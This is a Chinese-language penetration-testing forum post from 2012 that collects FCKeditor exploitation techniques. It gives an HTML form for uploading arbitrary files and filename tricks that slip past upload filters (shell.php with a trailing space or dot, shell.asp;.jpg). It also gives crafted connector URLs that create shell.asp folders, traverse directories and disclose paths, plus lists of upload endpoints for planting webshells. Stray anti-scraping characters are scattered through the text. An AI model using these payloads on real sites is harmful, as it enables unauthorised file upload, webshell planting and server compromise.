找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Fckeditor漏洞 (2)
返回列表 发新帖
查看: 3066|回复: 0
打印 上一主题 下一主题

Fckeditor漏洞 (2)

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:01:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结  
9 J- |7 J4 X! Y查看编辑器版本
" T) D4 p- Q% `* N9 d/ LFCKeditor/_whatsnew.html  c) V. z5 v6 A+ L+ B% k" a$ _
—————————————————————————————————————————————————————————————$ j. {4 h. d/ W2 ?

/ I  w# ]; N) B* j4 t2. Version 2.2 版本$ W) g2 ~* t8 O/ c* x
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
: D: |, F4 Y. s) K  J3 D: h—————————————————————————————————————————————————————————————
" v9 n# n- A! Q& D' H# E/ T- P* D8 j, [8 |
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。) j% h2 w: Q/ X8 y3 ?
<form id="frmUpload" enctype="multipart/form-data"
  o$ l  W0 I! L- ~$ iaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>0 O0 A! ^0 s" F$ L7 b4 D$ \$ h$ q/ j
<input type="file" name="NewFile" size="50"><br>( c% k8 w* ~; P* u: x6 y. ?0 d3 X
<input id="btnUpload" type="submit" value="Upload">
  _& E3 L! A. f9 o  Z</form>% p4 a4 C+ [/ h" u6 G' r
—————————————————————————————————————————————————————————————9 z: g( g$ O1 ~+ C- P
5 u! [8 b, S8 V' J9 s1 e' B# i
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
2 |" R3 X) }. {6 e9 z        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
0 ^& f) d7 R6 l" Z2 O    4.1:提交shell.php+空格绕过
' Y( {! V$ t( ~2 W不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。1 j. [) B" c7 A/ X# K+ ?6 m
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。+ A: [. V3 Y, W# `0 C# x
—————————————————————————————————————————————————————————————/ S% R2 S' K. V$ v8 a/ {

! _: X+ o2 e$ f5 \5. 突破建立文件夹  ?/ O, L* E8 K* u) V5 q" t
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
# [' S" P9 x" Y3 {2 yFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp( o: u6 f. m( B6 D* j- }$ V, \' `
—————————————————————————————————————————————————————————————
" X5 i) ^  ?& @) X  K/ J4 L! j& v9 t) _9 p# |; T7 _5 R7 R
6. FCKeditor 中test 文件的上传地址! l+ h, H/ I  D( y9 ?
FCKeditor/editor/filemanager/browser/default/connectors/test.html
0 W( k  c) P6 u' u$ hFCKeditor/editor/filemanager/upload/test.html
( ^; K% E5 q8 u9 e- T. S9 l% KFCKeditor/editor/filemanager/connectors/test.html3 u' H3 M+ I8 A- s5 t/ A
FCKeditor/editor/filemanager/connectors/uploadtest.html; ?/ _9 r; n8 e% I# d# `
—————————————————————————————————————————————————————————————
9 t8 W: r+ a& W3 D. l$ u. g3 I/ l# c- N: h
7.常用上传地址
$ U- ]  s9 [  S, z3 b" H( IFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/! f' E3 g  d6 Q) G5 o9 L
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp$ c7 X' Y% Q1 a6 Q0 B. V
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)0 I' V) L5 W! \: z% Q5 o
JSP 版:
+ \3 ^  W; m( X) Q, n& DFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
* l3 j8 x2 ^. _4 J8 h0 U注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
+ o) ~, E; Z. G; k' R+ R件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。# c5 O) m. D1 n/ e
—————————————————————————————————————————————————————————————1 q9 ]! k1 p7 S4 ?$ f% L, {6 z4 ?' o

. Q5 x* f4 |# P7 S- u, l% X8.其他上传地址: a5 R' c- A& o6 L+ b" ?5 H
FCKeditor/_samples/default.html8 U+ E& i2 P7 L1 ]
FCKeditor/_samples/asp/sample01.asp2 t/ z0 e! E3 ^6 v) I. ]  G7 S* B
FCKeditor/_samples/asp/sample02.asp
- q0 ]  v& k5 `/ x0 RFCKeditor/_samples/asp/sample03.asp
" a. W' p$ H+ ^* R' P( ?3 R  @FCKeditor/_samples/asp/sample04.asp
8 ?2 ?+ a4 N  d1 v3 b一般很多站点都已删除_samples 目录,可以试试。
) v% D5 ?4 x0 E9 k  j1 t9 NFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
2 Q! V/ B. C$ o' w5 y—————————————————————————————————————————————————————————————
- m1 K8 h$ v9 b- y1 d7 b2 g& a; E, ~$ E4 w% Q! k8 Q; J% x
9.列目录漏洞也可助找上传地址
* U5 r' f, p# O9 bVersion 2.4.1 测试通过
1 K6 T# |* {; Z: E修改CurrentFolder 参数使用 ../../来进入不同的目录% \3 d% G/ j( y: `
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp+ A+ N9 F6 w* e  Z7 K9 E: m" O5 K
根据返回的XML 信息可以查看网站所有的目录。) R( f$ ~% H5 B  a: I# t2 q
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F+ q. p8 i' Z8 N. y! {
也可以直接浏览盘符:1 W8 r2 O& x  H( ^% P
JSP 版本:9 f# w% K3 E; J' z# E6 Z
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F+ A- N9 v9 x! {& q1 s9 x3 f9 r
—————————————————————————————————————————————————————————————# z4 Y; }9 N0 b0 ?0 t7 q, m+ B

' B! [- L& j" A/ c- v1 N10.爆路径漏洞
& ?+ z% t' T' p$ y% S4 yFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
) W) ^* x# S: z% q! H% w8 t—————————————————————————————————————————————————————————————9 [8 J/ L  p' z( ^( \! i
9 o- i2 g, z: ~- M3 u# F' e; [
11. FCKeditor 被动限制策略所导致的过滤不严问题
9 e5 a, i1 f& f: \! c0 f) ]3 F        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
/ f! t4 t3 j; {  ?& D' \脆弱描述:4 `2 F& s3 U3 z3 d$ q) w
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
) }: _: Y. O( @  K0 ]/ y7 E2 x" A1 Mhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm: Q9 O2 N, P! p( v0 W) D* X
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
& O3 k1 g& S; D% `        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
8 P' H9 T+ i' [        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!$ p. t$ W% i3 O+ P3 y4 x  J
—————————————————————————————————————————————————————————————
& j" l1 N; N+ @. u% s
) h$ w$ t& N, ~+ _+ L12.最古老的漏洞,Type文件没有限制!" r4 S$ i$ D  _( S! U1 B
        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
. P3 e9 ^1 g! y  h4 g—————————————————————————————————————————————————————————————
+ C4 b' v3 p/ |  g0 y8 k
6 S3 e: P3 z5 r% ^6 E===============================================================================================================================================
5 e+ O+ p0 m! w
6 H6 ]* a5 \+ w2 p$ L! \) y7 SFCK编辑器jsp版本漏洞:- I0 V( Q# S; u& q! L
, z0 y5 G" E- c) f: }  L
( {& I/ h0 k* E7 p( v) D
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
5 T( J( E- K, o
1 x5 N- V7 _/ v. h; N5 n上传马所在目录
. l+ o( G8 u4 NFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
8 s) L& L0 ~; K& K6 I6 n* y上传shell的地址:" ?$ G% k, {" l: L" G
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
/ }! U/ \: V% Y$ l3 X+ B  g0 {8 @+ U跟版本有关系.并不是百分百成功. 测试成功几个站.' d9 U- D+ H- Q
不能通杀.很遗憾.; z" j! t, V2 v7 d; s
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
# K( n7 l. ^6 X# x0 g如果以上地址不行可以试试
  ?4 L( ^- v; sFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
; p: q. u- n3 c5 R! bFCKeditor/_samples/
& z2 S9 R( d: G: }6 `2 J3 aFCKeditor/_samples/default.html
6 e$ q( t/ i3 H5 z8 d5 ^- VFCKeditor/editor/fckeditor.htm$ I4 r) j' y: p& V+ {0 Z! E
FCKeditor/editor/fckdialog.html
" [5 B7 k- q2 z) i" V  W" L4 `7 a2 |( u+ S' U9 P* J/ P
  x' c7 M0 T. F) P$ w. x1 T, b$ S3 W

% {7 E5 a' }+ H2 d解析漏洞+未重命名文件时上传漏洞  1.asp;jpg
- I* a# P; M* ]' [9 t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表